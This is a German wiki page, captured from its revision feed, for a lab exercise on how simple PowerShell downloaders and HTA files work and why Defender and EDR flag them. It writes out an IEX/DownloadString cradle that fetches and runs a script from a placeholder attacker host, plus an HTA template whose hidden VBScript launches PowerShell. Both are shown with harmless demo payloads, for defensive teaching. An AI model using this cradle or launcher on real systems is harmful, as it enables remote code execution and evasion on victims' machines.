https://wiki.ixheim.de/index.php?action=history&feed=atom&title=PowerShell_%2F_HTA_Payload_Demonstration_%28Lab_Only%29 2026-05-14T19:32:09Z Versionsgeschichte dieser Seite in Xinux Wiki MediaWiki 1.35.1 https://wiki.ixheim.de/index.php?title=PowerShell_/_HTA_Payload_Demonstration_(Lab_Only)&diff=66801&oldid=prev 2026-02-11T16:22:22Z

<p>Die Seite wurde neu angelegt: „==Ziel der Übung== *Verständnis, wie einfache Downloader technisch funktionieren *Erkennen, warum Windows Defender anschlägt *Einordnung der Rolle von EDR-S…“</p> <p><b>Neue Seite</b></p><div>==Ziel der Übung==<br /> *Verständnis, wie einfache Downloader technisch funktionieren<br /> *Erkennen, warum Windows Defender anschlägt<br /> *Einordnung der Rolle von EDR-Systemen<br /> *Demonstration ausschließlich in isolierter Test-VM ohne Internetzugang<br /> <br /> ==Lab-Aufbau==<br /> *Angreifer-VM: Kali Linux<br /> *Opfer-VM: Windows 10/11 mit aktiviertem Defender<br /> *Netzwerk: Internes Host-Only-Netz<br /> *Kein Zugriff ins Internet<br /> <br /> ==Schritt 1 – Test-Webserver vorbereiten (Kali)==<br /> *mkdir /tmp/xinux-demo<br /> *cd /tmp/xinux-demo<br /> *echo &quot;Write-Output 'Download erfolgreich – Demo Script ausgeführt'&quot; &gt; demo.ps1<br /> *python3 -m http.server 8080<br /> <br /> *Der Webserver stellt eine harmlose PowerShell-Datei bereit.<br /> *Keine Schadfunktion – nur Ausgabe einer Meldung.<br /> <br /> ==Schritt 2 – Einfacher PowerShell-Downloader (Windows VM)==<br /> <br /> *Auf der Windows-VM PowerShell als normaler Benutzer starten.<br /> <br /> *Test-Download ausführen:<br /> powershell -ExecutionPolicy Bypass -Command &quot;IEX (New-Object Net.WebClient).DownloadString('http://&lt;KALI-IP&gt;:8080/demo.ps1')&quot;<br /> <br /> *Erwartung:<br /> *Script wird geladen und ausgeführt.<br /> *Konsole zeigt die Testmeldung an.<br /> <br /> ==Technische Erklärung==<br /> *New-Object Net.WebClient erzeugt HTTP-Client<br /> *DownloadString lädt Script als Text<br /> *IEX (Invoke-Expression) führt den geladenen Code direkt im Speicher aus<br /> *Keine Datei wird zwingend auf Disk gespeichert<br /> <br /> ==Warum Defender Alarm schlägt==<br /> *Heuristische Erkennung: Kombination aus Download + IEX ist verdächtig<br /> *Signaturbasierte Mustererkennung für typische Downloader-Techniken<br /> *AMSI (Antimalware Scan Interface) scannt Script-Inhalte vor Ausführung<br /> *Verhaltensanalyse erkennt Netzwerk + Script-Ausführung<br /> <br /> ==Demonstration Defender==<br /> *Windows-Sicherheit öffnen<br /> *Viren- &amp; Bedrohungsschutz → Schutzverlauf<br /> *Erkannte Bedrohung analysieren<br /> *Eintrag prüfen: Script oder verdächtiger Befehl<br /> <br /> ==Variante mit HTA-Datei (nur Konzept)==<br /> <br /> *Eine HTA-Datei ist eine HTML-Anwendung, die über mshta.exe ausgeführt wird.<br /> *HTA kann eingebettetes VBScript oder JScript enthalten.<br /> *Beim Start kann sie PowerShell aufrufen.<br /> <br /> *Beispielstruktur einer HTA-Datei:<br /> <br /> &lt;pre&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;script language=&quot;VBScript&quot;&gt;<br /> Set objShell = CreateObject(&quot;Wscript.Shell&quot;)<br /> objShell.Run &quot;powershell -Command Write-Output 'HTA gestartet'&quot;,0<br /> &lt;/script&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;&lt;/body&gt;<br /> &lt;/html&gt;<br /> &lt;/pre&gt;<br /> <br /> *Speichern als demo.hta<br /> *Start über Doppelklick<br /> <br /> ==Warum HTA problematisch ist==<br /> *mshta.exe ist signierte Windows-Komponente<br /> *Wird häufig für sogenannte &quot;Living off the Land&quot;-Techniken missbraucht<br /> *EDR erkennt Prozessketten:<br /> mshta.exe → powershell.exe → Netzwerkzugriff<br /> <br /> ==Rolle von EDR==<br /> *Klassische AV: Signatur + einfache Heuristik<br /> *EDR: Prozessüberwachung + Telemetrie<br /> *Erkennt:<br /> ** Eltern-Kind-Prozess-Beziehungen<br /> ** Netzwerkverbindungen<br /> ** Speicherbasierte Ausführung<br /> ** Anomales Benutzerverhalten<br /> <br /> ==Didaktischer Kern==<br /> *Downloader selbst ist technisch trivial<br /> *Gefährlich wird es durch Kombination aus:<br /> ** Social Engineering<br /> ** legitimen Systemtools<br /> ** Speicherbasierter Ausführung<br /> *Moderne Verteidigung analysiert Verhalten, nicht nur Dateien<br /> <br /> ==Abschlussdiskussion==<br /> *Warum Makros, HTA und PowerShell in Unternehmen eingeschränkt werden<br /> *Warum Application Control (z. B. AppLocker) sinnvoll ist<br /> *Warum Awareness-Schulung entscheidend bleibt<br /> <br /> ==Wichtiger Hinweis==<br /> *Nur in isolierter VM durchführen<br /> *Keine Tests gegen produktive Systeme<br /> *Keine Internet-Ziele verwenden</div>

Thomas.will